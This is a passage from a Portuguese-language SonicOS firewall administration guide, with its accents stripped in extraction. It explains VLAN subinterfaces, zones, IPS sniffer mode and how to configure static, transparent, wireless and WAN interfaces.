Engenharia. Por motivos de eficincia, os limites de domnio de difuso devem ser criados
de tal forma que fiquem alinhados com esses grupos de trabalho funcionais, mas isso no
sempre possvel: usurios de engenharia e de marketing podem estar misturados,
compartilhando o mesmo andar (e o mesmo switch de grupo de trabalho) em um edifcio
ou o oposto a equipe de engenharia poder estar espalhada em um campus. A tentativa
para solucionar isso com recursos complexos de cabeamento pode ser dispendiosa e
impossvel de manter com constantes adies e movimentaes. As VLANs permitem que
os switches sejam rapidamente reconfigurados para que o alinhamento lgico de rede
possa permanecer consistente com requisitos de grupo de trabalho.
Segurana os hosts em uma VLAN no podem se comunicar com hosts em outra VLAN,
a menos que algum dispositivo de rede facilite a comunicao entre eles.
Subinterfaces
O suporte de VLAN no SonicOS obtido por meio de subinterfaces que so interfaces lgicas
aninhadas abaixo de uma interface fsica. Cada ID exclusivo de VLAN requer sua prpria
subinterface. Por motivos de segurana e controle, o SonicOS no participa de qualquer
protocolo de truncamento VLAN, mas em vez disso requer que cada VLAN que deve ser
suportada seja configurada e atribuda com as caractersticas de segurana apropriadas.
Nota Os protocolos de truncamento VLAN dinmico, como VTP (Protocolo de truncamento

VLAN) ou GVRP (Protocolo de registro de VLAN genrico), no devem ser usados em links
de truncamento de outros dispositivos conectados ao firewall.
Os links de truncamento de switches compatveis com VLAN so suportados declarando os IDs

de VLAN relevantes como uma subinterface no firewall e configurando-os praticamente da
mesma forma que seria configurada uma interface fsica. Por outras palavras, apenas as
VLANs que so definidas como subinterfaces sero tratadas pelo firewall, sendo o restante
descartado como informaes irrelevantes. Esse mtodo tambm permite que a interface fsica
pai no firewall ao qual um link de truncamento est conectado opere como uma interface
convencional, fornecendo suporte para qualquer trfego VLAN (no marcado) nativo que
possa tambm existir no mesmo link. Como alternativa, a interface pai pode permanecer em
um estado "no atribudo".
As subinterfaces VLAN tm a maioria dos recursos e das caractersticas de uma interface
fsica, incluindo atribuio de zonas, servios de segurana, VPN de grupo, servidor DHCP,
auxiliar de IP, roteamento e controles de regras de acesso e polticas de NAT completas. Os
recursos excludos das subinterfaces VLAN no momento so o suporte de cliente dinmico
WAN e o suporte de difuso seletiva.
Objetos seguros do SonicOS

O esquema do SonicOS de endereamento de interface funciona em conjunto com zonas de
rede e objetos de endereos. Essa estrutura baseada em objetos seguros que so utilizados
por regras e polticas no SonicOS.
Os objetos seguros incluem objetos de interface que esto diretamente vinculados a interfaces
fsicas e so gerenciados na pgina Rede > Interfaces. Os objetos de endereos so definidos
na pgina Rede > Objetos de endereos. Os objetos de servio e agendamento so definidos
na seo Firewall da interface do usurio e os objetos de usurios so definidos na seo
Usurios.

As zonas so o pico hierrquico da arquitetura de objetos seguros do SonicOS. O SonicOS
inclui zonas predefinidas e tambm permite que voc defina suas prprias zonas. As zonas
predefinidas incluem LAN, DMZ, WAN, WLAN e Personalizado. As zonas podem incluir vrias
interfaces, no entanto, a zona de WAN est restrita a um total de duas interfaces. Na zona de
WAN, uma ou as duas interfaces de WAN podem estar ativamente passando trfego,
dependendo da configurao de balanceamento de carga e failover de WAN na pgina Rede
> Failover e LB de WAN.
Para obter mais informaes sobre o failover e o balanceamento de carga de WAN no
dispositivo de segurana da Dell SonicWALL, consulte Rede > Failover e balanceamento de
carga na pgina 255.
No nvel de configurao de zona, a configurao Permitir confiana de interface para zonas
automatiza os processos envolvidos na criao de uma regra de acesso permissiva entre
zonas. Ela cria um objeto de endereo abrangente para a zona inteira e uma regra de acesso
inclusivamente permissiva de endereo de zona para endereo de zona.
Modo transparente
O modo transparente no SonicOS usa interfaces como o nvel superior da hierarquia de
gerenciamento. O modo transparente suporta endereamento exclusivo e roteamento de
interface.
Modo de sniffer IPS

Suportado pelos dispositivos de segurana Dell SonicWALL, o modo de sniffer IPS uma
variao do modo de ponte de camada 2 que usado para deteco de intruses. A
configurao do modo de sniffer IPS permite que uma interface no firewall seja conectada a
uma porta espelhada em um switch para examinar o trfego de rede. Geralmente, essa
configurao usada com um switch dentro do gateway principal para monitorar o trfego na
intranet.
No diagrama de rede abaixo, o trfego flui para um switch na rede local e espelhado por meio
de uma porta de espelho do switch em uma interface do modo de sniffer IPS no dispositivo de
segurana Dell SonicWALL. O firewall inspeciona os pacotes de acordo com as configuraes
definidas no par de ponte. Os alertas podem disparar capturas de SNMP que so enviadas
para o gerenciador de SNMP especificado por meio de outra interface no firewall. O trfego de
rede descartado aps o firewall inspecion-lo.

A interface de WAN do firewall usada para conexo com o centro de dados do firewall para
atualizaes de assinatura ou outros dados.
Gateway
Main Mirrored Data

Data
Flow Network Security Appliance E7500
WAN Port
Incoming Event
Data Center Access
SNMP
Outgoing Alerts Bridge Mode
Reserved Port
E7500
No modo de sniffer de IPS, est configurada uma ponte de camada 2 entre duas interfaces na
mesma zona no firewall, como LAN-LAN ou DMZ-DMZ. Voc tambm pode criar uma zona
personalizada a ser usada para a ponte de camada 2. Apenas a zona de WAN no
apropriada para o modo de sniffer IPS.
O motivo para isso est relacionado com o fato de o SonicOS detectar todas as assinaturas no
trfego dentro da mesma zona, como o trfego de LAN-LAN, mas algumas assinaturas
direcionais especficas (lado do cliente em relao ao lado do servidor) no se aplicam a
alguns casos de LAN-WAN.
Qualquer interface da ponte de camada 2 pode ser conectada porta espelhada no switch.
Como o trfego de rede atravessa o switch, o trfego tambm enviado para a porta
espelhada e, a partir da, para o firewall para inspeo profunda de pacotes. Os eventos mal-
intencionados desencadeiam alertas e entradas de log e, se o SNMP estiver habilitado, so
enviadas capturas de SNMP para o endereo IP configurado do sistema gerenciador do SNMP.
O trfego no continua realmente para a outra interface da ponte de camada 2. O modo de
sniffer IPS no coloca o firewall em linha com o trfego de rede, ele apenas fornece uma forma
para inspecionar o trfego.
A tela Editar interfaces disponvel na pgina Rede > Interfaces fornece uma nova caixa de
seleo denominada Detectar somente trfego nesse par com ponte para ser usada ao
configurar o modo de sniffer IPS. Quando marcada, esta caixa de seleo faz com que o
firewall inspecione todos os pacotes que chegam ponte L2 a partir da porta do switch
espelhada. A caixa de seleo Nunca rotear trfego nesse par com ponte tambm deve ser
selecionada para o modo de sniffer IPS para garantir que o trfego da porta do switch
espelhada no seja enviado novamente para a rede.
Para obter instrues detalhadas sobre como configurar interfaces no modo de sniffer IPS,
consulte Configurar o modo de sniffer IPS na pgina 210.

Exemplo de topologia do modo de sniffer IPS
Esta seo fornece um exemplo de topologia que usa o modo de sniffer IPS do SonicWALL em
um ambiente de comutao ProCurve da Hewlett Packard. Esse cenrio depende da
capacidade dos pacotes de software de servidor ProCurve Manager Plus (PCM+) e Network
Immunity Manager (NIM) da HP para estrangular ou fechar portas das quais so provenientes
as ameaas.
Esse mtodo til em redes onde h um firewall existente que permanecer no local, mas voc
deseja usar os servios de segurana do firewall como um sensor.
Network Security Appliance E7500
SonicWALL NSA Appliance
HP HCM/
NIM + Server ISP
Third-party Firewall
Router
HP ProCurve
Switch
LAN Connection
X1 WAN Connection
Wireless File Email X0-LAN/ L2B Mode
Desktop
Client Client Server Server
Nesta implantao, a zona e a interface de WAN esto configuradas para o esquema de

endereamento da rede interna e conectadas rede interna. A porta X2 possui ponte de
camada 2 para a porta LAN, mas no ser conectada a nada. A porta LAN X0 est configurada
para uma segunda porta especialmente programada no switch ProCurve da HP. Essa porta
especial est definida para o modo de espelhamento ela encaminhar todas as portas do
servidor e todos os usurios internos para a porta de "deteco" no firewall. Isso permite que
o firewall analise todo o trfego da rede interna e, se qualquer trfego acionar as assinaturas
de segurana, ele capturar de imediato para o servidor PCM+/NIM atravs da interface WAN
X1 que, em seguida, poder executar a ao na porta especfica da qual a ameaa
proveniente.
Para configurar essa implantao, navegue at a pgina Rede > Interfaces e clique no cone
de configurao da interface X2. Na pgina Configuraes de X2, defina a Atribuio de IP
para "Modo de ponte de camada 2" e defina a interface Com ponte para: como "X0". Marque
a caixa de seleo Detectar somente trfego nesse par com ponte. Clique em OK para
salvar e ativar a alterao.

Em seguida, v para a pgina Rede > Interfaces e clique no cone de configurao da
interface WAN X1. Na pgina Configuraes de X1, atribua um endereo IP exclusivo ao
segmento de LAN interno de sua rede. Isso pode parecer errado, mas ser realmente a
interface a partir da qual voc gerenciar o dispositivo e tambm ser a interface a partir da
qual o dispositivo enviar suas capturas de SNMP, bem como a interface a partir da qual sero
obtidas atualizaes de assinatura de servios de segurana. Clique em OK.
Voc tambm deve modificar as regras de firewall para permitir trfego de LAN para WAN e de
WAN para LAN, caso contrrio, o trfego no passar com xito.
Conecte a porta do switch de alcance/espelho a X0 no firewall, no a X2 (na verdade X2 no
est conectada), e conecte X1 rede interna. Tenha cuidado ao programar as portas que esto
estendidas/espelhadas para X0.
Configurar interfaces
As sees a seguir descrevem a configurao da interface:
Configurar uma interface esttica na pgina 193
Configurar o modo roteado na pgina 196
Habilitar o gerenciamento de largura de banda na pgina 196
Configurar interfaces no modo de IP transparente (unir sub-rede L3) na pgina 197
Configurar interfaces sem fio na pgina 200
Configurar uma interface de WAN na pgina 202
Configurar agregao de links e redundncia de portas na pgina 206
Configurar subinterfaces de VLAN na pgina 209
Configurar o modo de sniffer IPS na pgina 210
Configurar modo de ponte de camada 2 na pgina 240
Configurar uma interface esttica

Esttico significa que voc atribui um endereo IP fixo interface.
Etapa 1 Clique no cone Configurar na coluna Configurar da interface que voc deseja configurar.
A caixa de dilogo Editar interface exibida.
Voc pode configurar X0 a X19 ou a interface MGMT.
Se voc desejar criar uma nova zona, selecione Criar nova zona. A janela Adicionar
zona exibida. Consulte Rede > Zonas na pgina 263 para obter instrues sobre
como adicionar uma zona.
Etapa 2 Selecione uma zona para atribuir interface. Voc pode selecionar LAN, WAN, DMZ, WLAN
ou uma zona personalizada.
Etapa 3 Selecione Esttico no menu Atribuio de IP.
Etapa 4 Digite o endereo IP e a mscara de sub-rede da interface nos campos Endereo IP e
Mscara de sub-rede.

Nota Voc no pode inserir um endereo IP que est na mesma sub-rede que outra zona.
Etapa 5 Se configurar uma interface de zona de WAN ou a interface de MGMT, digite o endereo IP do
dispositivo de gateway no campo Gateway padro. O dispositivo de gateway fornece acesso
entre esta interface e a rede externa quer seja a Internet ou uma rede privada. Um gateway
opcional para interfaces de zona de DMZ ou LAN.
Etapa 6 Se configurar uma interface de zona de WAN, digite os endereos IP de at trs servidores
DNS nos campos Servidor DNS. Eles podem ser servidores DNS pblicos ou privados. Para
obter mais informaes, consulte Configurar uma interface de WAN na pgina 202.
Etapa 7 Introduza qualquer texto de comentrio opcional no campo Comentrio. Este texto exibido
na coluna Comentrio da tabela Interface.
Etapa 8 Se voc desejar habilitar o gerenciamento remoto do firewall a partir desta interface, selecione
o(s) protocolo(s) de gerenciamento suportado(s): HTTPS, SSH, Ping, SNMP e/ou SSH.
Para permitir o acesso interface de WAN para gerenciamento de outra zona no mesmo
dispositivo, devem ser criadas regras de acesso. Para obter mais informaes, consulte
Permitir acesso ao IP primrio de WAN a partir da zona de LAN na pgina 566.
Etapa 9 Se voc desejar permitir que usurios selecionados com direitos de gerenciamento limitado
efetuem logon no dispositivo de segurana, selecione HTTP e/ou HTTPS em Login do
usurio.
Nota A senha do administrador necessria para gerar novamente chaves de criptografia aps
alterar o endereo do firewall.
Definir configuraes avanadas para uma interface esttica
As opes disponveis na guia Avanado de uma interface esttica variaro de acordo com a
zona selecionada.
Etapa 1 Na caixa de dilogo Editar interface, clique na guia Avanado.

Etapa 2 Para Velocidade de link, se a opo Negociar automaticamente estiver selecionada por
padro, voc pode alter-la para uma velocidade de link especfica e duplex. Para aqueles em
que isto se aplica, deixar como Negociar automaticamente faz com que os dispositivos
conectados negociem automaticamente a velocidade e modo duplex da conexo Ethernet. Se
voc desejar especificar a velocidade de Ethernet e duplex forada, selecione uma das
seguintes opes no menu Velocidade de link:
Para interfaces de 1 Gbps, selecione:
1 Gbps Full Duplex
100 Mbps Full Duplex
100 Mbps Half Duplex
10 Mbps Full Duplex
10 Mbps Half Duplex
Para interfaces de 10 Gbps, a seleo nica 10 Gbps Full Duplex.

Cuidado Se voc selecionar uma velocidade de Ethernet e duplex especficos, voc deve forar
tambm a velocidade da conexo e o duplex da placa Ethernet para o firewall.
Etapa 3 Voc pode optar por substituir a opo Usar endereo MAC padro para a interface
selecionando Substituir endereo MAC padro e inserindo o endereo MAC no campo.
Etapa 4 Marque a caixa de seleo Porta de encerramento para colocar temporariamente essa
interface offline para manuteno ou por outros motivos. Se conectado, o link ficar inativo.
Desmarque a caixa de seleo para ativar a interface e permitir que o link fique novamente
ativo.
Etapa 5 Para o recurso AppFlow, marque a caixa de seleo Habilitar relatrios de fluxo para permitir
relatrios de fluxo em fluxos criados para esta interface.
Etapa 6 Marque a caixa de seleo Habilitar suporte a difuso seletiva para permitir a recepo de
difuso seletiva nesta interface.
Etapa 7 Marque a caixa de seleo Habilitar marcas 802.1p para marcar informaes passando nessa
interface com informaes de prioridade 802.1p para gerenciamento de Qualidade de Servio
(QoS). Os pacotes enviados por meio dessa interface so marcados com VLAN id=0 e
transmitem informaes de prioridade 802.1p. Para usar essas informaes de prioridade, os
dispositivos conectados a esta interface devem suportar quadros de prioridade. O
gerenciamento de QoS controlado por regras de acesso na pgina Firewall > Regras de
acesso. Para obter informaes sobre o gerenciamento de QoS e largura de banda, consulte
Configuraes de firewall > Mapeamento QoS na pgina 725.
Etapa 8 Como alternativa, selecione Agregao de links ou Redundncia de portas na lista
suspensa Redundncia/agregao de portas. Para obter mais informaes, consulte
Configurar agregao de links e redundncia de portas na pgina 206.
Etapa 9 Como alternativa, marque a caixa de seleo Usar modo roteado. Para obter mais
informaes sobre o Modo roteado, consulte Configurar o modo roteado na pgina 196.
Etapa 10 MTU da interface Especifica o maior tamanho de pacote que a interface pode encaminhar
sem fragmentar o pacote. Identifique o tamanho dos pacotes que a porta receber e
transmitir:
1500 Pacotes padro (padro)
9000 Pacotes do Quadro Jumbo
Observe que o suporte ao quadro jumbo deve ser habilitado antes que uma porta possa
processar quadros jumbo, conforme explicado em Quadro Jumbo na pgina 674.
Nota Devido aos requisitos de tamanho do buffer dos pacotes do quadro jumbo, os quadros
jumbo aumentam os requisitos de memria por um fator de 4.
Fragmentar pacotes de sada no VPN maiores que a MTU dessa interface

especifica todos os pacotes de sada no VPN maiores que a MTU da interface
fragmentados. A especificao da fragmentao de pacotes de sada VPN realizada
na pgina VPN > Avanado.
Ignorar bit no fragmentar (DF) substitui bits DF em pacotes.
Eliminar gerao de mensagem Fragmentao ICMP necessria bloqueia a
notificao de que esta interface pode receber pacotes fragmentados.
Etapa 11 Opcionalmente, habilite o gerenciamento de largura de banda para esta interface. Para obter
mais informaes sobre o gerenciamento de largura de banda, consulte Habilitar o
gerenciamento de largura de banda na pgina 196.

Configurar o modo roteado
O modo roteado uma alternativa a NAT para rotear trfego entre os intervalos de endereos
IP pblicos separados. Considere a topologia a seguir em que o firewall est roteando trfego
em dois intervalos de endereos IP pblicos:
10.50.26.0/24
172.16.6.0/24
Habilitando o modo roteado na interface para a rede 172.16.6.0, as converses de NAT sero
desabilitadas automaticamente para a interface e todo o trfego de entrada e sada ser
roteado para a interface de WAN configurada para a rede 10.50.26.0.
Nota O modo roteado est disponvel ao usar o modo de IP esttico para interfaces nas zonas
de LAN, DMZ e WLAN. Para DMZ, o modo tambm est disponvel ao usar o modo de ponte
de camada 2.
Para configurar o modo roteado, execute as seguintes etapas:
Etapa 1 Navegue at a pgina Rede > Interfaces. Clique no cone Configurar da interface apropriada.
A janela Editar interface ser exibida.
Etapa 2 Clique na guia Avanado.
Etapa 3 No ttulo Configuraes do modo especializado, marque a caixa de seleo Usar modo
roteado Adicionar poltica de NAT para impedir a converso de sada/entrada para
habilitar o modo roteado para a interface.
Etapa 4 Na lista suspensa Interface de sada/entrada com poltica de NAT, selecione a interface de
WAN que deve ser usada para rotear o trfego para a interface.
O firewall cria ento as polticas de "no NAT" para a interface configurada e para a interface
de WAN selecionada. Essas polticas substituem quaisquer polticas de NAT M21 mais gerais
que podem ser configuradas para as interfaces.
Habilitar o gerenciamento de largura de banda

O Gerenciamento de largura de banda (BWM) permite que os administradores da rede
garantam a largura de banda mnima e priorizem o trfego. O BWM habilitado na pgina
Firewall > BWM. Ao controlar a quantidade de largura de banda para um aplicativo ou usurio,
o administrador de rede pode prevenir que um pequeno nmero de aplicativos ou usurios
consumam toda a largura de banda disponvel. O balanceamento da largura de banda alocada
a diferentes trfegos de rede e a atribuio de prioridades ao trfego melhoram o desempenho
da rede.
Trs tipos de gerenciamento de largura de banda podem ser habilitados na pgina Firewall >
BWM:
Avanado Permite que os administradores configurem limitaes da largura de banda
mxima de entrada e sada por interface, configurando objetos de largura de banda, regras de
acesso e polticas de aplicativo.
Global Permite que os administradores habilitem configuraes do BWM globalmente e
apliquem-nas a todas as interfaces. BWM Global a configurao padro do BWM.
Nenhum Desabilita o BWM.

Para obter informaes sobre a configurao do gerenciamento da largura de banda, consulte
Configuraes de firewall > BWMna pgina 677.
O SonicOS pode aplicar gerenciamento de largura de banda no trfego de egresso (sada) e
ingresso (entrada) em todas as interfaces. O gerenciamento de largura de banda de sada
realizado usando a o enfileiramento baseado em classe. O gerenciamento da largura de banda
de entrada realizado por meio da implementao do algoritmo de atraso ACK que usa o
comportamento intrnseco de TCP para controlar o trfego.
O enfileiramento baseado em classe (CBQ) fornece uma qualidade de servio (QoS) de largura
de banda mxima e garantida para o firewall. Todos os pacotes destinados interface so
enfileirados na fila de prioridade correspondente. Em seguida, o programador desenfileira os
pacotes e transmite-os no link, dependendo da largura de banda garantida para o fluxo e da
largura de banda disponvel no link.
Use a seo Gerenciamento de largura de banda da tela Editar interface para habilitar ou
desabilitar o gerenciamento de largura de banda de ingresso e egresso. A largura de banda de
ingresso e egresso disponvel do link pode ser usada para configurar as velocidades de
conexo upstream e downstream em quilobits por segundo.
Habilitar gerenciamento de largura de banda egressa habilita o gerenciamento de
largura de banda de sada.
Largura de banda egressa de interface disponvel (Kbps) especifica a largura de
banda disponvel para a interface em quilobits por segundo.
Habilitar gerenciamento de largura da banda ingressa habilita o gerenciamento de
largura de banda de entrada.
Largura de banda ingressa de interface disponvel (Kbps) especifica a largura de
banda disponvel para a interface em quilobits por segundo.
Configurar interfaces no modo de IP transparente (unir sub-rede L3)

O modo de IP transparente permite que o dispositivo de segurana Dell SonicWALL preencha
a sub-rede da WAN em uma interface interna. Para configurar uma interface para o modo
transparente, conclua as seguintes etapas:
Etapa 1 Clique no cone Configurar na coluna Configurar da Interface no atribuda que voc deseja
configurar. A caixa de dilogo Editar interface exibida.
Etapa 2 Selecione uma interface.
Se voc selecionar uma interface configurvel, selecione LAN ou DMZ para Zona.
Se voc deseja criar uma nova zona para a interface configurvel, selecione Criar uma
nova zona. A janela Adicionar zona exibida. Consulte Rede > Zonas na pgina 263
para obter instrues sobre como adicionar uma zona.
Etapa 3 Selecione Modo de IP transparente (unir sub-rede L3) no menu Atribuio de IP.
Etapa 4 No menu Intervalo transparente, selecione um objeto de endereo que contm o intervalo de
endereos IP que voc deseja acessar por meio dessa interface. O intervalo de endereos
deve estar dentro de uma zona interna, como LAN, DMZ ou outra zona confivel que
corresponda zona usada para a interface transparente interna. Se voc no tem um objeto
de endereo configurado que atenda s suas necessidades:
No menu Intervalo transparente, selecione Criar novo objeto de endereo.

Na janela Adicionar objeto de endereo, digite um nome para o intervalo de
endereos. Para Atribuio de zonas, selecione uma zona interna, como LAN, DMZ,
ou outra zona confivel.
O intervalo no deve incluir o endereo IP (X0) da interface LAN.
Para Tipo, selecione:
Host se desejar que apenas um dispositivo de rede se conecte a esta interface.
Intervalo para especificar um intervalo de endereos IP digitando os valores inicial
e final do intervalo.
Rede para especificar uma sub-rede, digitando o valor de incio e a mscara de
sub-rede. A sub-rede deve estar dentro do intervalo de endereos de WAN e no
pode incluir o endereo IP de interface de WAN.
c. Digite o endereo IP do host, os endereos de incio e de trmino do intervalo ou o
endereo IP ou a mscara de sub-rede da rede.
d. Clique em OK para criar o objeto de endereo e retornar caixa de dilogo Editar
interface.
Para obter mais informaes, consulte Rede > Objetos de endereos na pgina 275.
o(s) protocolo(s) de gerenciamento suportado(s): HTTPS, Ping, SNMP e/ou SSH.
efetuem logon diretamente no dispositivo de segurana atravs desta interface, selecione
HTTP e/ou HTTPS em Login do usurio.
Nota A senha do administrador necessria para gerar novamente chaves de criptografia aps
alterar o endereo do firewall.
Definir configuraes avanadas para uma interface do modo de IP transparente

1 Gbps Full Duplex
10 Mbps Full Duplex
10 Mbps Half Duplex

ativo.
Etapa 9 Marque a caixa de seleo Habilitar encaminhamento ARP gratuito para WAN para
encaminhar pacotes de ARP gratuitos recebidos nesta interface para a WAN, usando o
endereo MAC do hardware da interface de WAN como o endereo MAC de origem.
Etapa 10 Marque a caixa de seleo Habilitar gerao automtica de ARP gratuito para WAN para
enviar automaticamente pacotes de ARP gratuitos para a WAN sempre que uma nova entrada
adicionada tabela de ARP para um novo computador nesta interface. O endereo MAC do
hardware da interface de WAN usado como o endereo MAC de origem do pacote de ARP.

Configurar interfaces sem fio
Uma interface sem fio uma interface que foi atribuda a uma zona sem fio e usada para
suportar pontos de acesso seguro do SonicWALL SonicPoint.
Etapa 1 Clique no cone Configurar na coluna Configurar da interface que voc deseja configurar.
Etapa 2 Na lista Zona, selecione WLAN ou uma zona sem fio personalizada.
Etapa 3 Para Atribuio de IP/modo, selecione o modo de IP esttico. Voc tambm pode selecionar
o Modo de ponte de camada 2. Consulte Modo de ponte de camada 2 na pgina 219 para obter
mais informaes.
Etapa 4 Digite o endereo IP e a mscara de sub-rede da zona nos campos Endereo IP e Mscara
de sub-rede.
Nota O limite superior da mscara de sub-rede determinado pelo nmero de SonicPoints que
voc selecionar no campo Limite de SonicPoints. Se voc estiver configurando vrias
interfaces ou subinterfaces como interfaces sem fio, convm usar uma sub-rede menor
(superior) para limitar o nmero de concesses DHCP possveis disponveis na interface.
Caso contrrio, se voc usar uma sub-rede de classe C (mscara de sub-rede de
255.255.255.0) para cada interface sem fio, voc poder exceder o limite de concesses
DHCP disponveis no dispositivo de segurana.
Etapa 5 No campo Limite de SonicPoints selecione o nmero mximo de SonicPoints permitidos

nesta interface.
Esse valor determina a mscara de sub-rede mais alta que voc pode inserir no campo
Mscara de sub-rede. A tabela a seguir mostra o limite da mscara de sub-rede para
cada seleo de Limite de SonicPoints e o nmero de concesses DHCP disponveis
na interface se voc digitar a mscara de sub-rede mxima permitida.
Os IPs de cliente disponveis assumem 1 IP para a interface de gateway do firewall,
alm da presena do nmero mximo de SonicPoints permitidos nesta interface, cada
um consumindo um endereo IP.
Mscara de sub-rede Total de

SonicPoints por interface mxima endereos IP IPs de cliente
utilizveis disponveis
Nenhum SonicPoint 30 bits 255.255.255.252 2 2
2 SonicPoints 29 bits 255.255.255.248 6 3

Nota A tabela acima mostra os tamanhos de mscara de sub-rede mximos permitidos. Voc
ainda pode usar sub-redes de classe completa (classe A, classe B ou classe C) ou qualquer
mscara de sub-rede de comprimento varivel que voc desejar em interfaces de WLAN.
Aconselhamos usar uma mscara de sub-rede menor (por exemplo, classe C de 24 bits
255.255.255.0 total de 254 IPs utilizveis), alocando assim mais espao de
endereamento IP para clientes se voc tiver a necessidade de suportar nmeros maiores
de clientes sem fio.
usurio.
Definir configuraes avanadas para uma interface sem fio

1 Gbps Full Duplex
10 Mbps Full Duplex
10 Mbps Half Duplex

ativo.
Etapa 9 Como alternativa, marque a caixa de seleo Usar modo roteado. Para obter mais informaes
sobre o Modo roteado, consulte Configurar o modo roteado na pgina 196.
Configurar uma interface de WAN

A configurao de uma interface de WAN habilita a conectividade com a Internet. Voc pode
configurar at N menos 2 interfaces de WAN no dispositivo de segurana Dell SonicWALL, em
que N o nmero de interfaces definidas na unidade (ambas fsica e VLAN). Somente as
interfaces X0 e MGMT no podem ser configuradas como interfaces de WAN.
Comece por configurar sua interface de WAN na guia Geral da caixa de dilogo Editar
interface.
Etapa 1 Clique no cone Editar na coluna Configurar da interface que voc deseja configurar. A
caixa de dilogo Editar interface exibida.
Etapa 2 Se voc estiver configurando uma interface no atribuda, selecione WAN no menu Zona. Se
voc tiver selecionado a interface WAN padro, a opo WAN j est selecionada no menu
Zona.
Etapa 3 Selecione um dos seguintes modos de endereamento de rede de WAN no menu Atribuio
de IP. Dependendo da opo que voc escolher no menu Atribuio de IP, preencha os campos
correspondentes que so exibidos depois de selecionar a opo.

Esttico configura o firewall de uma rede que usa endereos IP estticos.
DHCP configura o firewall para solicitar configuraes de IP de um servidor DHCP
na Internet. NAT com cliente de DHCP um modo de endereamento de rede tpico
para clientes DSL e por cabo.
PPPoE usa o protocolo ponto a ponto na Ethernet (PPPoE) para se conectar
Internet. Se um nome de usurio e uma senha forem exigidos pelo seu ISP, insira-os
nos campos Nome do usurio e Senha do usurio. Esse protocolo normalmente
encontrado ao usar um modem DSL.
PPTP usa o PPTP (Protocolo de encapsulamento ponto a ponto) para se conectar a
um servidor remoto. Ele suporta implementaes de Microsoft Windows mais antigas
que exigem conectividade de encapsulamento.
L2TP usa IPsec para se conectar a um servidor L2TP (Protocolo de tunelamento de
camada 2) e criptografa todos os dados transmitidos do cliente para o servidor. No
entanto, ele no criptografa trfego de rede para outros destinos.
Modo de cabo (cabo de 2 portas) permite a insero do firewall em uma rede, no
modo Bypass, Inspecionar ou Proteger. Para obter informaes detalhadas, consulte
Configurar o modo de cabo e de tap na pgina 214.
Modo de tap (tap de 1 porta) permite a insero do firewall em uma rede para uso
com taps de rede, espelhos de porta ou portas SPAN. Para obter informaes
detalhadas, consulte Configurar o modo de cabo e de tap na pgina 214.
Etapa 4 Se estiver usando DHCP, digite opcionalmente um nome descritivo no campo Nome do host
e quaisquer comentrios desejados no campo Comentrio.
Etapa 5 Se estiver usando PPPoE, PPTP ou L2TP, so exibidos campos adicionais:
Se for exibido Cronograma, selecione o cronograma desejado na lista suspensa
durante o qual esta interface dever ser conectada.
Em Nome do usurio e Senha do usurio, digite o nome e a senha da conta
fornecidos pelo seu ISP.
Se o campo Endereo IP de servidor for exibido, insira o endereo IP do servidor
fornecido pelo seu ISP.
Se o campo Nome do host (cliente) for exibido, insira o nome do host do dispositivo.
Este o Nome do firewall da pgina Sistema>Administrao.
Se o campo Segredo compartilhado for exibido, insira o valor fornecido pelo seu ISP.
Etapa 7 Se estiver usando PPPoE, PPTP ou L2TP, so exibidos campos adicionais:
Para PPPoE, selecione um dos seguintes botes de opo:
Selecione Obter um endereo IP automaticamente para obter o endereo IP do
servidor PPPoE.
Selecione Especificar endereo IP e insira o endereo IP desejado no campo
para usar um endereo IP esttico para esta interface.
Para PPTP ou L2TP, configure as seguintes opes:

Marque a caixa de seleo Desconexo por inatividade e insira o nmero de
minutos de inatividade aps a qual a conexo ser encerrada. Limpe esta caixa de
seleo para desabilitar os tempos limite de inatividade.
Selecione DHCP ou Esttico na lista suspensa Atribuio de IP. Para DHCP, o
endereo IP, a mscara de sub-rede e o endereo de gateway sero
automaticamente configurados pelo servidor. Para Esttico, digite os valores
adequados para esses campos.
Etapa 8 Se estiver usando DHCP, marque opcionalmente as caixas de seleo seguintes:
Selecione Solicitar renovao de IP anterior ao inicializar para solicitar o mesmo
endereo IP da interface de WAN que anteriormente foi fornecido pelo servidor DHCP.
Selecione Renovar a concesso de DHCP em qualquer ocorrncia de link ativo
para enviar uma solicitao de renovao de concesso para o servidor DHCP a cada
vez que esta interface de WAN se reconectar aps ser desconectada.
Os campos exibidos abaixo dessas opes so fornecidos pelo servidor DHCP. Aps a
configurao, os botes Renovar, Liberar e Atualizar ficam disponveis:
Clique em Renovar para reiniciar a durao de concesso de DHCP para o endereo
IP atualmente atribudo.
Clique em Liberar para cancelar a concesso de DHCP para o endereo IP atual. A
conexo ser descartada. Voc precisar obter um novo endereo IP do servidor
DHCP para restabelecer a conectividade.
Clique em Atualizar para obter um novo endereo IP do servidor DHCP.
efetuem logon diretamente no dispositivo de segurana a partir desta interface, selecione
HTTP e/ou HTTPS em Login do usurio.
Etapa 10 Marque Adicionar regra para habilitar o redirecionamento de HTTP para HTTPS se desejar
que uma conexo HTTP seja redirecionada automaticamente para uma conexo HTTPS
segura no firewall.
Etapa 11 Continuar a configurao nas guias Avanado e Protocolo (se exibidas), conforme descrito
abaixo. Depois de concluir a configurao de WAN para seu Modo de endereamento de rede,
clique em OK.
Definir configuraes avanadas para uma interface de WAN

1 Gbps Full Duplex
10 Mbps Full Duplex
10 Mbps Half Duplex

ativo.
Etapa 9 MTU da interface Especifica o maior tamanho de pacote que a interface pode encaminhar
sem fragmentar o pacote. Identifique o tamanho dos pacotes que a porta receber e
transmitir:
1500 Pacotes padro (padro)
9000 Pacotes do Quadro Jumbo
Observe que o suporte ao quadro jumbo deve ser habilitado antes que uma porta possa
processar quadros jumbo, conforme explicado em Quadro Jumbo na pgina 674.
Nota Devido aos requisitos de tamanho do buffer dos pacotes do quadro jumbo, os quadros
jumbo aumentam os requisitos de memria por um fator de 4.
Fragmentar pacotes de sada no VPN maiores que a MTU dessa interface

especifica todos os pacotes de sada no VPN maiores que a MTU da interface
fragmentados. A especificao da fragmentao de pacotes de sada VPN realizada
na pgina VPN > Avanado.
Ignorar bit no fragmentar (DF) substitui bits DF em pacotes.
Eliminar gerao de mensagem Fragmentao ICMP necessria bloqueia a
notificao de que esta interface pode receber pacotes fragmentados.
Etapa 10 Se estiver usando DHCP, as seguintes opes sero exibidas:
Marque a caixa de seleo Iniciar renovaes com uma descoberta ao usar DHCP
se for possvel alterar o servidor.

Marque a caixa de seleo Usar um intervalo de _ segundos entre descobertas de
DHCP durante a aquisio de concesso e ajuste o nmero de segundos do
intervalo se o servidor DHCP no responder imediatamente.
Definir configuraes de protocolo para uma interface de WAN
Se voc especificou uma atribuio de IP PPPoE, PPTP ou L2TP ao configurar a interface de

